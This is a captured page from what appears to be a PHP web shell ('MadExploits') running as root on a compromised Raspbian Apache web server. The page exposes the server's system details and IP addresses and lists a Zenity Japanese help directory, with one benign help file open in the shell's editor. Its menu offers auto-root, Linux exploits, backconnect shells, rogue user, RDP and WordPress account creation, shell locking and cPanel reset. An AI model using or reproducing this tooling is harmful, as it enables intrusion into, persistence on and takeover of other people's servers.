Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
help /
ja /
zenity /
[ HOME SHELL ]
Name
Size
Permission
Action
figures
[ DIR ]
drwxr-xr-x
calendar.page
2.84
KB
-rw-r--r--
color-selection.page
1.68
KB
-rw-r--r--
entry.page
2.07
KB
-rw-r--r--
error.page
1.09
KB
-rw-r--r--
file-selection.page
2.63
KB
-rw-r--r--
forms.page
2.86
KB
-rw-r--r--
index.page
1.07
KB
-rw-r--r--
info.page
1.13
KB
-rw-r--r--
intro.page
1.31
KB
-rw-r--r--
legal.xml
2.85
KB
-rw-r--r--
list.page
3.33
KB
-rw-r--r--
message.page
865
B
-rw-r--r--
notification.page
2.32
KB
-rw-r--r--
password.page
1.63
KB
-rw-r--r--
progress.page
2.74
KB
-rw-r--r--
question.page
1.06
KB
-rw-r--r--
scale.page
2.53
KB
-rw-r--r--
text.page
2.76
KB
-rw-r--r--
usage.page
9.8
KB
-rw-r--r--
warning.page
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : color-selection.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" id="color-selection" xml:lang="ja"> <info> <link type="guide" xref="index#dialogs"/> <desc><cmd>--color-selection</cmd> オプションの使用</desc> <mal:credit xmlns:mal="http://projectmallard.org/1.0/" type="translator copyright"> <mal:name>赤星 柔充</mal:name> <mal:email>yasumichi@vinelinux.org</mal:email> <mal:years>2011,2012</mal:years> </mal:credit> </info> <title>色選択ダイアログ</title> <p>色選択ダイアログを作成するには、<cmd>--color-selection</cmd> というオプションを使ってください。</p> <p>色選択ダイアログは、以下のオプションをサポートしています。</p> <terms> <item> <title><cmd>--color</cmd>=<var>値</var></title> <p>初期の色を指定します。(例: #FF0000)</p> </item> <item> <title><cmd>--show-palette</cmd></title> <p>パレットを表示します。</p> </item> </terms> <p>以下のスクリプトの例で色選択ダイアログの作成方法を示します。</p> <code> #!/bin/sh COLOR=`zenity --color-selection --show-palette` case $? in 0) echo "$COLOR を選択しました。";; 1) echo "色が選択されませんでした。";; -1) echo "予期せぬエラーが発生しました。";; esac </code> <figure> <title>色選択ダイアログの例</title> <desc><app>Zenity</app> 色選択ダイアログの例</desc> <media type="image" mime="image/png" src="figures/zenity-colorselection-screenshot.png"/> </figure> </page>
Close